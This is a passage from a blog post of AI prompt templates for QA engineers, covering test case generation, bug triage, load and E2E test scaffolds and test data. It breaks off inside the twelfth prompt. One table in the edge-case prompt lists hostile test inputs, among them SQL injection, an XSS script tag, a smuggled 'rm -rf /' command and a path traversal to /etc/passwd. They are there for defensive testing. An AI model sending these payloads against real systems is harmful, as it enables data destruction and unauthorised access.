Featured image for Quality Assurance Supercharged: AI Prompts for QA Engineers
Prompt Engineering ·
Intermediate
· · 42 min read · Updated

Quality Assurance Supercharged: AI Prompts for QA Engineers

Master QA with 15 AI prompts for test case generation, bug reporting, automation scripts, and security testing. Streamline your testing workflow today.

qatestingquality assurancetest automationbug reportingAI prompts

I’ll never forget my first bug that slipped into production. It was a simple payment calculation error—off by one cent on large orders. The finance team caught it. The CEO got an angry call from a major client. I got a post-mortem meeting and a newfound respect for thorough testing.

That was five years ago. Since then, I’ve learned that QA isn’t about finding bugs—it’s about building confidence. Every test you write, every edge case you consider, every automation script you create… it’s all about making sure that when you ship, you ship with confidence.

And here’s what I wish someone had told me earlier: AI prompts can multiply your testing effectiveness by 5x or more. Not by replacing your judgment, but by giving you frameworks and accelerating the tedious work. This post shares the 15 prompts I use almost every day as a QA engineer. If you want to dive deeper into prompt engineering fundamentals, check out our guide on becoming an AI prompt engineer.

Why QA Prompts Matter

The average QA engineer spends 40% of their time on repetitive tasks that could be templated or generated. Writing test cases. Creating bug reports. Generating test data. Writing automation scripts. With the right prompts, you can turn hours of work into minutes.

But here’s the catch: a bad test is worse than no test. It gives you false confidence. These prompts are designed to help you think systematically about testing, not to replace your critical thinking. Use them as a starting point, then apply your expertise.

Test Planning and Requirements Prompts

1. Acceptance Criteria to Test Cases

The gap between acceptance criteria and test cases is where bugs hide. Vague AC like “user should be able to login” creates vague tests. Specific AC creates specific, verifiable tests. This prompt bridges that gap.

Purpose: Transform User Story Acceptance Criteria into comprehensive, verifiable test checklists Use case: Converting user stories into testable scenarios


Prompt:

You are a QA Analyst. Your task is to transform User Story Acceptance Criteria into a comprehensive, verifiable test checklist.

CONTEXT
- User Story: {COPY THE USER STORY HERE}
- Acceptance Criteria: {LIST EACH AC ITEM}
- Feature Context: {ADDITIONAL CONTEXT ABOUT THE FEATURE}
- User Persona: {WHO IS THE END USER?}
- Definition of Done: {WHAT DOES "DONE" LOOK LIKE?}

AC TO TEST CASE MAPPING
- AC1: [acceptance criteria] | [test case] | [verification: Manual/Automated]
- AC2: [acceptance criteria] | [test case] | [verification method]
- AC3: [acceptance criteria] | [test case] | [verification method]

OUTPUT FORMAT - TEST CASE CHECKLIST
AC Ref | Test Case | Preconditions | Steps | Expected Result | Status
AC1 | | | | | Pass/Fail
AC2 | | | | |
AC3 | | | | |

AC Ref | Test Case | Screen | Expected Result | Browser/Device
| | | | |

AC Ref | Test Case | External System | Expected Behavior
| | | |

ACCEPTANCE CRITERIA COVERAGE MATRIX
AC | Covered By | Test ID | Notes
AC1 | | | |
AC2 | | | |
AC3 | | | |

GHERKIN FORMAT (Optional)
CODE:
Feature: [Feature name]

  Scenario: [Scenario name]
    Given [Precondition]
    When [Action]
    Then [Expected result]
END CODE

SUMMARY
Metric | Value
Total acceptance criteria |
Total test cases generated |
Criteria with full coverage |
Criteria needing clarification |

BEST PRACTICES
- Each AC should have at least one test
- Include positive AND negative tests
- Verify edge cases for critical ACs
- Ensure tests are actionable
- Link tests back to requirements

Customize it: Be specific about the feature context. The more background you provide, the better the test cases will cover real-world scenarios.

2. Manual Test Case Generator

I’ve reviewed thousands of test cases in my career. The difference between good and bad test cases is often the difference between catching bugs and missing them. A good test case has clear preconditions, specific steps, and verifiable expected results.

Purpose: Generate comprehensive step-by-step test cases for a feature requirement Use case: Creating test case documentation before execution


Prompt:

You are a QA Test Engineer. Your task is to generate comprehensive step-by-step test cases for a feature requirement.

CONTEXT
- Feature: {DESCRIBE THE FEATURE IN DETAIL}
- Requirements: {LIST SPECIFIC REQUIREMENTS}
- Platform: {WEB/MOBILE/API/DESKTOP}
- User Roles: {WHAT USER TYPES EXIST?}
- Test Environment: {STAGING/DEV/QA ENVIRONMENT}

TEST CASE FRAMEWORK
Field | Description
Test ID | Unique identifier
Title | Clear test description
Preconditions | Setup required before test
Steps | Numbered action sequence
Expected Result | What should happen
Priority | P1/P2/P3
Category | Functional/Negative/Edge

TEST COVERAGE AREAS
Area | What to Test
Positive flow | Main happy path
Negative flow | Invalid inputs, errors
Boundary values | Min/max limits
Data types | Wrong formats
Permissions | Role-based access
UI/UX | Layout, responsiveness

OUTPUT FORMAT - TEST CASE SUITE
TC ID | Title | Preconditions | Steps | Expected Result | Priority
TC-001 | | | | | P1/P2/P3
TC-002 | | | | |
TC-003 | | | | |
TC-004 | | | | |
TC-005 | | | | |

POSITIVE TEST CASES
Test # | Description | Steps | Expected Result
1 | Happy path scenario | 1-5 steps | Main success path
2 | Alternative success path | 1-5 steps | Success variant

NEGATIVE TEST CASES
Test # | Description | Input | Expected Error
1 | Invalid input type | Wrong data type | Validation error shown
2 | Missing required field | Empty required field | Field required message
3 | Invalid format | Incorrect format | Format error message

EDGE CASES
Test # | Scenario | Why It's Edge
1 | Empty string | Boundary condition
2 | Max length input | Upper boundary
3 | Special characters | Encoding handling

SUMMARY
Metric | Count
Total test cases |
Positive tests |
Negative tests |
Edge cases |
P1 (Critical) |
P2 (High) |
P3 (Medium) |

BEST PRACTICES
- Each step should be actionable and atomic
- Expected results should be objectively verifiable
- Include cleanup steps where needed
- Group related tests together
- Prioritize based on risk and frequency of use

Customize it: Focus on the most critical user journeys first. Don’t try to test everything at once—prioritize.

3. Severity/Priority Classifier

One of the hardest skills in QA is accurately classifying bugs. Over-prioritize and you mask real critical issues. Under-prioritize and production breaks. This prompt gives you a systematic framework for classification.

Purpose: Analyze bug reports and assign appropriate severity and priority levels Use case: Triage and classification of incoming bugs


Prompt:

You are a Bug Triage Specialist. Your task is to analyze bug reports and assign appropriate severity and priority levels.

CONTEXT
- Bug Impact: {DESCRIBE THE IMPACT ON USERS}
- Frequency: {HOW OFTEN DOES IT OCCUR - 100%, intermittent?}
- Affected Users: {PERCENTAGE OF USERS AFFECTED}
- Workaround Available: {IS THERE A WAY AROUND THIS BUG?}
- Business Criticality: {HOW CRITICAL IS THE AFFECTED FEATURE?}

SEVERITY LEVELS
Level | Definition | User Impact | Example
Critical | System down, data loss | Cannot work at all | Login broken, data corrupted
High | Major feature broken | Significant impact | Checkout fails, payments broken
Medium | Feature impaired | Some impact | Search slow, UI glitch
Low | Minor issue | Minimal impact | Typo, spacing issue

PRIORITY LEVELS
Priority | Definition | Fix Timeline | Criteria
P1 | Urgent | 24 hours | Critical bug, all users affected
P2 | High | 1 week | High severity, many users affected
P3 | Normal | 2 weeks | Medium severity, workaround exists
P4 | Low | Next release | Low severity, cosmetic issue

OUTPUT FORMAT - CLASSIFICATION MATRIX
Criteria | Critical | High | Medium | Low
User impact | Can't work | Major issue | Minor issue | Cosmetic
Revenue impact | Lost revenue | Significant | Minimal | None
Data loss | Yes | Potential | No | No
Security | Breach | Vulnerability | None | None
Workaround | None | Complex | Easy | N/A

DECISION TREE - SEVERITY ASSESSMENT
CODE:
Is the system/application unusable?
├── YES → Critical
└── NO → Is a major feature broken?
    ├── YES → High
    └── NO → Is functionality impaired?
        ├── YES → Medium
        └── NO → Low
END CODE

DECISION TREE - PRIORITY ASSESSMENT
CODE:
Is this affecting all users in production?
├── YES → P1
└── NO → Is there a workaround?
    ├── NO → P2
    └── YES → Is it blocking many users?
        ├── YES → P2
        └── NO → When should we fix?
            ├── This sprint → P3
            └── Next release → P4
END CODE

CLASSIFICATION RESULT
Field | Value
Bug ID |
Suggested Severity |
Suggested Priority |
Rationale |

IMPACT ANALYSIS
Dimension | Assessment | Details
User Impact | |
Business Impact | |
Frequency | |
Workaround | |

RECOMMENDED ACTIONS
Priority | Action
P1 | Immediate hotfix, notify stakeholders
P2 | Fix in current sprint, inform users
P3 | Normal backlog, schedule fix
P4 | Backlog, fix when time permits

BEST PRACTICES
- Be consistent across all bugs
- Consider both user impact AND business impact
- Document your rationale
- Reassess as new information emerges
- Align with any SLA requirements

Customize it: Be honest about the impact. It’s easy to overestimate severity when you’re the one who found the bug.

4. Regression Test Suite Selector

Here’s a truth no one tells you in QA training: running all tests every time is impossible at scale. The key skill is knowing which tests to run based on what changed. This prompt helps you make that decision systematically.

Purpose: Identify which tests to run based on code changes Use case: Determining regression test scope for a given change


Prompt:

You are a Regression Testing Strategist. Your task is to identify which tests to run based on code changes.

CONTEXT
- Changed Files: {LIST FILES THAT CHANGED}
- Changed Components: {WHAT COMPONENTS WERE MODIFIED?}
- Test Coverage Map: {IF YOU HAVE A TEST-MATRIX, DESCRIBE IT}
- Test Suite Size: {HOW MANY TESTS TOTAL?}
- Time Constraint: {HOW MUCH TIME DO YOU HAVE?}

REGRESSION TESTING APPROACHES
Approach | Coverage | Time | When to Use
Full suite | 100% | Long | Major release
Affected only | ~60% | Medium | Small changes
Critical path | ~30% | Short | Hotfix, time crunch
Risk-based | Variable | Variable | Most common scenario

OUTPUT FORMAT - CHANGED FILES ANALYSIS
File | Component | Tests Affected
| | |
| | |

RISK ASSESSMENT
Component | Change Type | Risk Level | Tests Needed
| Bug fix | High/Med/Low |
| New feature | High |
| Refactor | Medium |
| Config change | Low |

RECOMMENDED TEST SUITE
Critical Path Tests (Must Run)
Test Name | Component | Why Critical
| | Core functionality
| |

Affected Feature Tests
Test Name | Component | Triggered By
| | File changed
| |

Integration Tests
Test Name | Components | Why Run
| | Interface testing
| |

TEST SELECTION SUMMARY
Category | Count | Time Estimate
Critical path |
Unit tests |
Integration tests |
E2E tests |
Total |

EXECUTION ORDER (Priority)
1. Run critical path tests first
2. Follow with affected feature tests
3. End with lower priority tests

RECOMMENDED COVERAGE
Test Type | Coverage | Reason
Unit tests | % | Fast, catches regressions
Integration | % | Catches interface issues
E2E tests | % | User journey validation
Smoke tests | 100% | Basic sanity check

BEST PRACTICES
- Always run critical path tests first
- Automate test selection when possible
- Maintain a current test matrix
- Prioritize tests by potential failure impact
- Consider test execution time
- Document test rationale
- Review and update regularly

Customize it: Be conservative about risk. If you’re unsure, err on the side of running more tests.

Test Execution Prompts

5. Edge Case Brainstormer

The best QA engineers I know think like malicious users. They ask “what happens if…” constantly. This prompt helps you systematically identify edge cases you might otherwise miss.

Purpose: Identify unusual inputs, boundary conditions, and unexpected user behaviors Use case: Thinking through edge cases before or during testing


Prompt:

You are a Creative QA Specialist. Your task is to identify unusual inputs, boundary conditions, and unexpected user behaviors that could break an application.

CONTEXT
- Component: {FORM/INPUT/FEATURE/API/UI ELEMENT}
- Expected Input: {WHAT INPUT IS THIS COMPONENT EXPECTING?}
- Input Type: {TEXT/NUMBER/DATE/FILE/UPLOAD}
- Constraints: {WHAT ARE THE CONSTRAINTS?}
- User Scenario: {HOW DO USERS TYPICALLY USE THIS?}

EDGE CASE CATEGORIES
Category | Examples | Why It Matters
Boundary values | 0, -1, max, empty, null | Limit behavior often breaks
Data types | Wrong types, null, undefined | Type safety issues
Special characters | SQLi, XSS, emojis | Security/encoding issues
Unicode | Non-ASCII, RTL, zero-width | Internationalization
Timing | Race conditions, timeouts | Concurrency problems
State | Logged out, expired, cached | Session handling
Network | Offline, slow, interrupted | Resilience testing
Volume | Large files, many items | Performance issues

OUTPUT FORMAT - IDENTIFIED EDGE CASES
# | Category | Scenario | Test Approach
1 | Boundary | Empty string | Verify handling
2 | Boundary | Max length +1 | Verify truncation
3 | Type | Wrong type | Verify validation
| | | |

INPUT BOUNDARY TESTS
Value | Type | Expected Behavior
Empty string | Boundary |
Single character | Boundary |
Max length | Boundary |
Max + 1 | Boundary |
Zero | Boundary |
Negative | Boundary |
Special chars | Character |
Unicode | Character |
SQL injection | Security |
XSS payload | Security |

UNHAPPY PATH SCENARIOS
Scenario | Trigger | Expected Behavior
User provides null | Null input | Graceful handling
User provides undefined | Undefined value | Error message shown
User provides array instead of string | Wrong type | Validation error
Whitespace only | Empty spaces | Strip or validate
Leading/trailing spaces | String input | Handle correctly
HTML tags | User input | Sanitize/escape
Script tags | User input | Block/sanitize

WEIRD USER BEHAVIORS
Behavior | Description | Test For
Rapid clicking | Double/triple submit | Duplicate submissions
Copy/paste weird content | From PDF/doc | Formatting issues
Autofill unexpected data | Browser autocomplete | Wrong data accepted
Session timeout during action | Expired session | Handle gracefully
Back button mid-flow | Cached state | State consistency
Multiple tabs | Concurrent sessions | Data sync issues

SECURITY EDGE CASES
Payload Type | Example | Check For
SQL Injection | ' OR '1'='1 | Database exposure
XSS | <script>alert(1)</script> | Script execution
Command Injection | ; rm -rf / | OS command execution
Path traversal | ../../../etc/passwd | File access
LDAP injection | *)(uid=*)) | Directory exposure

API-SPECIFIC EDGE CASES
Scenario | Request | Expected Response
Missing auth header | No Authorization | 401 Unauthorized
Expired token | Expired JWT | 401/403 Forbidden
Wrong HTTP method | GET instead of POST | 405 Method Not Allowed
Malformed JSON | Invalid JSON | 400 Bad Request
Oversized payload | Too much data | 413 Payload Too Large
Rate limit hit | Too many requests | 429 Too Many Requests

BEST PRACTICES
- Think like a malicious user
- Consider all data types and states
- Test at system boundaries
- Include edge cases in regression
- Document all findings
- Share learnings with developers

Customize it: Focus on edge cases relevant to your specific component. A form field needs different edge case testing than an API endpoint.

6. Performance Scenario Generator

Performance bugs are different from functional bugs. Your application might work perfectly with one user but collapse under load. This prompt helps you plan performance tests that matter. According to the National Institute of Standards and Technology, performance testing should be integrated early in the development cycle for optimal results.

Purpose: Define load testing scenarios for performance validation Use case: Planning performance and load tests


Prompt:

You are a Performance Testing Specialist. Your task is to define load testing scenarios for performance validation.

CONTEXT
- Test Tool: {JMETER/K6/GATLING/LOCUST}
- Target System: {API/UI/FullSystem}
- Performance Goals: {WHAT ARE YOUR TARGETS?}
- Test Duration: {HOW LONG SHOULD TESTS RUN?}
- Test Data: {WHAT DATA DO YOU NEED?}

LOAD TESTING FRAMEWORK
Load Pattern | Use Case | Description
Steady state | Baseline | Constant load
Ramp up | Warm up | Gradually increase load
Spike | Stress test | Sudden burst of users
Soak | Endurance | Long duration testing
Peak | Capacity | Maximum expected load

KEY METRICS
Metric | Description | Target
Response time | Time for response | < X ms
Throughput | Requests per second | > X RPS
Error rate | Failed requests | < X%
Concurrent users | Simultaneous users | X users
P95/P99 | Percentile response | < X ms

OUTPUT FORMAT - SCENARIO DEFINITION
Scenario: [Name]
Description | [What this scenario tests]
Duration | [How long]
Target RPS | [Requests per second]
Concurrent Users | [Number of users]

LOAD PROFILE
Phase | Duration | Users | Ramp | Purpose
Warmup | | 0 → X | gradual | Initialize system
Steady | | X | none | Baseline measurement
Peak | | X → Y | ramp | Stress test
Cooldown | | Y → 0 | gradual | Wind down

JMETER SCENARIO (Template)
CODE:
Test Plan:
  Thread Group:
    - Ramp-up Period: [SECONDS]
    - Loop Count: [NUMBER]
    - CSV Data Set:
      Filename: [FILE]
      Variable Names: [VARS]

    HTTP Request:
      - Server: [HOST]
      - Path: [PATH]
      - Method: [METHOD]

    Listeners:
      - View Results Tree
      - Summary Report
      - Response Times Over Time
END CODE

K6 SCENARIO (Template)
CODE:
import http from 'k6/http';
import { check, sleep } from 'k6';

export const options = {
  stages: [
    { duration: '[WARMUP]', target: [USERS] },
    { duration: '[STEADY]', target: [USERS] },
    { duration: '[PEAK]', target: [MAX_USERS] },
    { duration: '[COOLDOWN]', target: 0 },
  ],
  thresholds: {
    http_req_duration: ['p(95)<[MS]'],
    http_req_failed: ['rate<[RATE]'],
  },
};

export default function() {
  const payload = JSON.stringify({});
  const params = { headers: { 'Content-Type': 'application/json' } };

  const res = http.[METHOD]('[URL]', payload, params);

  check(res, { 'status is 200': (r) => r.status === 200 });
  sleep(1);
}
END CODE

LOAD PARAMETERS
Phase | Users | Duration | RPS Target
Warmup | 0 → X | |
Baseline | X | |
Stress | X → Y | |
Peak | Y | |
Cooldown | Y → 0 | |

SUCCESS CRITERIA
Metric | Target | Threshold | Status
Avg Response | < X ms | | ☐ Pass
P95 Response | < X ms | | ☐ Pass
P99 Response | < X ms | | ☐ Pass
Throughput | > X RPS | | ☐ Pass
Error Rate | < X% | | ☐ Pass

RESOURCE MONITORING
Resource | Warning | Critical
CPU | > 70% | > 90%
Memory | > 80% | > 95%
Disk I/O | > 70% | > 90%
Network | > 80% | > 95%

BEST PRACTICES
- Always warm up the system first
- Use realistic test data
- Monitor server resources during tests
- Run multiple iterations for consistency
- Test at expected peak load
- Document all thresholds
- Test failure scenarios too

Customize it: Set realistic targets based on your SLAs and known system capacity.

Automation Prompts

7. Unit Test Writer

Unit tests are your first line of defense. They’re fast, they’re isolated, and they catch regressions before they propagate. This prompt generates comprehensive unit tests for your functions. For more automation patterns, see our AI agent code patterns guide.

Purpose: Write isolated, comprehensive unit tests for provided functions Use case: Generating unit tests for new or existing code


Prompt:

You are a Unit Test Specialist. Your task is to write isolated, comprehensive unit tests for provided functions.

CONTEXT
- Language: {JAVASCRIPT/PYTHON/TYPESCRIPT}
- Framework: {JEST/PYTEST/VITEST}
- Function/Class: {PASTE THE CODE TO TEST}
- Dependencies: {LIST EXTERNAL DEPENDENCIES}
- Mock Requirements: {WHAT NEEDS TO BE MOCKED?}

UNIT TEST FRAMEWORK
Jest Structure Template
CODE:
describe('Module/Function', () => {
  beforeAll(() => { /* setup */ })
  beforeEach(() => { /* reset */ })
  afterEach(() => { /* cleanup */ })
  afterAll(() => { /* teardown */ })

  describe('positive cases', () => {
    it('should [EXPECTED_BEHAVIOR]', () => {
      const result = functionName(input)
      expect(result).toEqual(expected)
    })
  })

  describe('negative cases', () => {
    it('should throw [ERROR] for [INPUT]', () => {
      expect(() => functionName(input)).toThrow()
    })
  })
})
END CODE

PyTest Structure Template
CODE:
import pytest
from module import function_name

class TestModule:
    def setup_method(self):
        """Setup"""
        pass

    def test_[TEST_NAME](self):
        """Test description"""
        result = function_name(input)
        assert result == expected

    def test_[NEGATIVE](self):
        """Negative test"""
        with pytest.raises(ExpectedException):
            function_name(invalid_input)
END CODE

OUTPUT FORMAT - TEST SUITE STRUCTURE
Happy Path Tests
Test Name | Input | Expected | Reason
test_returns_correct_type | | | Verify type
test_handles_valid_input | | | Core functionality
test_processes_multiple_items | | | Batch handling

Edge Case Tests
Test Name | Input | Expected | Reason
test_handles_empty_input | "" or [] | Error or default | Null safety
test_handles_undefined | undefined | Error or default | Undefined handling
test_handles_null | null | Error or default | Null value handling
test_handles_whitespace | " " | Trimmed string | String trimming
test_handles_special_chars | Special chars | Handled correctly | Encoding

Error Handling Tests
Test Name | Input | Expected Error | Message
test_throws_on_invalid | | TypeError |
test_returns_default_on_error | | | Fallback value

Boundary Tests
Test Name | Input | Expected | Reason
test_min_value | | | Lower boundary
test_max_value | | | Upper boundary
test_negative_boundary | | | Negative values
test_zero_boundary | | | Zero value

MOCK CONFIGURATION
Jest mocks template
CODE:
jest.mock('dependency', () => ({
  method: jest.fn(),
  anotherMethod: jest.fn().mockReturnValue(value)
}))
END CODE

COVERAGE AREAS
Category | Covered | Notes
Happy path | ☐ |
Error cases | ☐ |
Edge cases | ☐ |
Boundary tests | ☐ |

BEST PRACTICES
- Test one thing per test
- Use descriptive test names
- Follow Arrange-Act-Assert pattern
- Avoid test interdependence
- Mock external dependencies
- Aim for meaningful coverage
- Test behavior, not implementation

Customize it: Provide the actual code you want to test. The more context about edge cases and error handling, the better the tests.

8. Cypress/Playwright Script Writer

End-to-end tests simulate real user journeys. They’re slower and more brittle than unit tests, but they catch the bugs that matter—bugs users would actually encounter. This prompt writes E2E test scripts for you. The official Playwright documentation and Cypress guides provide additional best practices for structuring your test suites.

Purpose: Write complete, executable E2E test scripts for user flows Use case: Automating user journey tests


Prompt:

You are an E2E Test Automation Engineer. Your task is to write complete, executable E2E test scripts for user flows.

CONTEXT
- User Flow: {DESCRIBE THE USER JOURNEY}
- Test Steps: {LIST THE STEPS IN ORDER}
- Test Data: {WHAT DATA IS NEEDED?}
- Assertions: {WHAT SHOULD WE VERIFY?}
- Framework: {CYPRESS/PLAYWRIGHT}
- Base URL: {BASE URL FOR TESTING}

E2E TEST FRAMEWORK
Common Commands (Cypress)
Command | Purpose
cy.visit() | Navigate to URL
cy.get() | Select element
cy.click() | Click element
cy.type() | Enter text
cy.should() | Assertion

Common Commands (Playwright)
Command | Purpose
page.goto() | Navigate to URL
page.locator() | Select element
page.click() | Click element
page.fill() | Enter text
page.expect() | Assertion

OUTPUT FORMAT - CYPRESS TEST SCRIPT
CODE:
describe('User Flow: [FLOW_NAME]', () => {
  beforeEach(() => {
    // Setup
    cy.visit('[BASE_URL]')
  })

  it('should complete [SCENARIO_NAME]', () => {
    // Step 1: [ACTION]
    cy.get('[SELECTOR]').should('be.visible')

    // Step 2: [ACTION]
    cy.get('[SELECTOR]').click()

    // Step 3: [ACTION]
    cy.get('[SELECTOR]').type('[INPUT]')

    // Step 4: [ACTION]
    cy.get('[SELECTOR]').click()

    // Assertion
    cy.get('[RESULT_SELECTOR]')
      .should('be.visible')
      .and('contain', '[EXPECTED_TEXT]')
  })

  it('should handle [NEGATIVE_SCENARIO]', () => {
    // Negative test scenario
  })
})
END CODE

OUTPUT FORMAT - PLAYWRIGHT TEST SCRIPT
CODE:
import { test, expect } from '@playwright/test';

test.describe('User Flow: [FLOW_NAME]', () => {
  test.beforeEach(async ({ page }) => {
    await page.goto('[BASE_URL]');
  });

  test('should complete [SCENARIO_NAME]', async ({ page }) => {
    // Step 1: [ACTION]
    await expect(page.locator('[SELECTOR]')).toBeVisible();

    // Step 2: [ACTION]
    await page.locator('[SELECTOR]').click();

    // Step 3: [ACTION]
    await page.locator('[SELECTOR]').fill('[INPUT]');

    // Step 4: [ACTION]
    await page.locator('[SELECTOR]').click();

    // Assertion
    await expect(page.locator('[RESULT_SELECTOR]'))
      .toBeVisible();
    await expect(page.locator('[RESULT_SELECTOR]'))
      .toContainText('[EXPECTED_TEXT]');
  });
});
END CODE

TEST DATA SETUP
CODE:
const testData = {
  user: {
    email: '[EMAIL]',
    password: '[PASSWORD]'
  },
  item: {
    name: '[ITEM]',
    quantity: [NUMBER]
  }
};
END CODE

ELEMENT SELECTORS
Element | Recommended Selector | Fallback Option
Button | data-testid | id | class
Input | name | id | label
Link | href | text |

WAITS AND TIMEOUTS
Situation | Approach
Network idle | cy.intercept() / waitForResponse()
Element visible | .should('be.visible')
API call complete | Wait for response

BEST PRACTICES
- Use stable selectors (data-testid preferred)
- Avoid hardcoded sleeps
- Test happy path AND edge cases
- Clean up test data after tests
- Use page objects for complex flows
- Mock external services when needed

Customize it: Provide the actual selectors and steps. Replace placeholders with real element identifiers.

9. CSS Selector Finder

One of the most frustrating parts of E2E testing is finding stable selectors. This prompt analyzes your HTML and recommends the best selectors to use.

Purpose: Find the most robust, stable CSS selectors for HTML elements Use case: Creating stable selectors for automation


Prompt:

You are a Test Automation Selector Specialist. Your task is to find the most robust, stable CSS selectors for HTML elements.

CONTEXT
- HTML Element: {PASTE THE HTML ELEMENT}
- Element Purpose: {WHAT DOES THIS ELEMENT DO?}
- Framework: {CYPRESS/PLAYWRIGHT/SELENIUM}
- Application Type: {SPA/TRADITIONAL}
- Unique Characteristics: {ANY DISTINGUISHING ATTRIBUTES?}

SELECTOR STRATEGY
Selector Priority (Best to Worst)
Priority | Type | Example | Pros | Cons
1 | data-testid | data-testid="submit-btn" | Stable | Requires adding attribute
2 | data-cy | data-cy="email-input" | Cypress native | Needs attribute
3 | ID | #login-button | Fast | May change frequently
4 | Name | [name="username"] | Semantic | Not always unique
5 | Class | .btn-primary | Common | Not unique
6 | Attribute | [type="email"] | Flexible | Verbose
7 | XPath | //div/span | Powerful | Brittle, avoid

OUTPUT FORMAT - SELECTOR ANALYSIS
Available Attributes
Attribute | Value | Usable | Confidence
id | | ☐ | High/Med/Low
name | | ☐ |
class | | ☐ |
data-* | | ☐ |
aria-* | | ☐ |

Recommended Selectors
Rank | Selector | Type | Confidence | Why
1 | | data-testid | High | Stable, intentional
2 | | ID | Medium | Fast but may change
3 | | Class | Low | May not be unique

Cypress Selectors
CODE:
// Primary (Recommended)
cy.get('[data-testid="[VALUE]"]')

// Alternative 1
cy.get('#[ID]')

// Alternative 2
cy.get('[NAME="[VALUE]"]')

// Alternative 3
cy.get('[ATTRIBUTE="VALUE"]')
END CODE

Playwright Selectors
CODE:
// Primary
page.getByTestId('[VALUE]')

// Alternative 1
page.locator('#[ID]')

// Alternative 2
page.locator('[NAME="[VALUE]"]')

// Alternative 3
page.getByRole('[ROLE]', { name: '[TEXT]' })
END CODE

XPATH (Last Resort)
Type | Syntax | Example
By ID | //*[@id="value"] |
By text | //[TEXT]="Value" |
By attribute | //[@data-cy="value"] |
By position | (//div)[5] |
By parent | //parent//child |

DYNAMIC ELEMENT HANDLING
Challenge | Solution
Dynamic ID | Use stable parent or data attributes
Changing text | Use contains or regex
Multiple matches | Add index or more specific selector
Shadow DOM | Use shadow piercing selector
Iframe | Switch context first

BEST PRACTICES
- Add data-testid during development
- Avoid XPath when possible
- Don't use generated class names
- Make selectors resilient to change
- Avoid indices when possible
- Test selectors in devtools first
- Document complex selectors

Customize it: Paste the actual HTML element you need a selector for.

Test Data and Reporting Prompts

10. Bug Report Generator

A good bug report saves hours of back-and-forth. I’ve seen bug reports that took 5 minutes to write and 2 hours to debug, and I’ve seen bug reports that took 10 minutes to write and 10 minutes to fix. This prompt helps you write the latter. For comprehensive error handling patterns, see our AI error handling snippets.

Purpose: Create clear, actionable bug reports Use case: Documenting bugs for developers


Prompt:

You are a Bug Report Specialist. Your task is to create clear, actionable bug reports that help developers quickly understand and fix issues.

CONTEXT
- Bug Type: {FUNCTIONAL/UI/PERFORMANCE/SECURITY}
- Feature/Area: {WHERE DID YOU FIND THE BUG?}
- Environment: {BROWSER, OS, VERSION}
- Reproduction Rate: {100%/50%/INTERMITTENT}
- Reported By: {WHO FOUND IT?}

BUG REPORT FRAMEWORK
Field | Purpose | Example
Title | Quick identification | "Login fails on Safari 15"
Summary | Brief description | What and where
Steps to Reproduce | How to trigger | Numbered list
Actual Result | What happened | Current behavior
Expected Result | What should happen | Correct behavior
Severity | Impact level | Blocker/Critical/Major/Minor
Priority | Fix urgency | P1/P2/P3
Environment | Where it occurs | OS, Browser, Version
Evidence | Proof of bug | Screenshot, logs

OUTPUT FORMAT - BUG REPORT
Basic Information
Field | Value
Bug ID | BUG-[NUMBER]
Title |
Status | New/Confirmed/In Progress/Fixed
Severity | Critical/High/Medium/Low
Priority | P1/P2/P3
Assigned to |
Reporter |

Description
Summary: [Brief one-line description]

Module: [Feature/Area where bug occurs]

Environment:
Property | Value
OS |
Browser |
App Version |
Device |

Steps to Reproduce
Step | Action | Expected | Actual
1 | | | |
2 | | | |
3 | | | |

Reproduction Rate: [100% / 50% / Intermittent]

Actual vs Expected
Actual Behavior: [What actually happens]

Expected Behavior: [What should happen]

Evidence
- [ ] Screenshot attached
- [ ] Video recording attached
- [ ] Console logs attached
- [ ] Network logs attached
- [ ] HAR file attached

Screenshot: [Description of visual]

Additional Information
Root Cause (if known): [Analysis of why it happens]

Suggested Fix (optional): [How to fix it]

Workaround: [Temporary solution]

BEST PRACTICES
- Reproduce the bug before reporting
- Be specific about versions and environment
- Include exact steps, not generalizations
- Add evidence (screenshots, logs)
- Distinguish actual vs expected clearly
- Assign appropriate severity/priority
- Follow up with reproduction rate

Customize it: Be as specific as possible. Vague bug reports like “it doesn’t work” are useless.

11. Synthetic User Generator

Real user data has GDPR implications. Fake data can be unrealistic. This prompt generates synthetic user data that’s realistic enough for testing but safe to use.

Purpose: Generate realistic synthetic user data for testing Use case: Creating test data for forms, APIs, and databases


Prompt:

You are a Test Data Specialist. Your task is to generate realistic synthetic user data for testing.

CONTEXT
- Number of Users: {HOW MANY DO YOU NEED?}
- User Type: {REGISTERED/TEST/BOT/MIXED}
- Fields Required: {WHAT DATA FIELDS?}
- Format: {JSON/CSV/SQL}
- Region/Locale: {US/UK/EU/etc.}
- Special Requirements: {ANY EDGE CASES?}

USER DATA FRAMEWORK
Field Type | Format | Example
Name | First Last | John Smith
Email | format@domain | john.smith@test.com
Phone | Format varies | +1-555-0123
Address | Street, City, Zip | 123 Main St, NYC
Date | YYYY-MM-DD | 1990-05-15
Country | ISO code | US

OUTPUT FORMAT - JSON
CODE:
[
  {
    "id": 1,
    "firstName": "",
    "lastName": "",
    "email": "",
    "phone": "",
    "address": {
      "street": "",
      "city": "",
      "state": "",
      "zipCode": "",
      "country": ""
    },
    "dateOfBirth": "",
    "gender": "",
    "username": "",
    "password": "",
    "createdAt": "",
    "status": ""
  }
]
END CODE

User Data Table
ID | First Name | Last Name | Email | Phone | City
1 | | | | |
2 | | | | |
3 | | | | |

Special Data Variations
User Type | Characteristics
Edge case | Empty fields, special chars
International | Non-US formats
Long values | Max length strings
Unicode | Non-ASCII characters

Data Quality Notes
Check | Status
Unique emails | ☐
Valid phone format | ☐
Realistic names | ☐
Consistent data | ☐

BEST PRACTICES
- Ensure email uniqueness
- Use realistic name/address distributions
- Include edge case users
- Vary data for diversity
- Match locale formatting
- Include invalid data for negative tests

Customize it: Specify exactly what fields you need and what format works best for your test infrastructure.

12. SQL Insert Statement Generator

Database testing requires database data. This prompt generates SQL INSERT statements with realistic test data for your specific table schema.

Purpose: Generate SQL INSERT statements with realistic test data Use case: Creating test data in databases


Prompt:

You are a Test Data Specialist. Your task is to generate SQL INSERT statements with realistic test data.

CONTEXT
- Table Name: {YOUR TABLE NAME}
- Columns: {LIST COLUMNS WITH TYPES}
- Number of Rows: {HOW MANY?}
- Database Type: {MYSQL/POSTGRESQL/SQLITE/MSSQL}
- Data Type: {RANDOM/SPECIFIC PATTERNS}
- Constraints: {ANY CONSTRAINTS?}

SQL FRAMEWORK
Basic INSERT Syntax
INSERT INTO table_name (col1, col2, col3)
VALUES (val1, val2, val3);

Bulk INSERT Syntax
INSERT INTO table_name (col1, col2, col3)
VALUES
  (val1, val2, val3),
  (val1, val2, val3),
  (val1, val2, val3);

OUTPUT FORMAT - TABLE SCHEMA
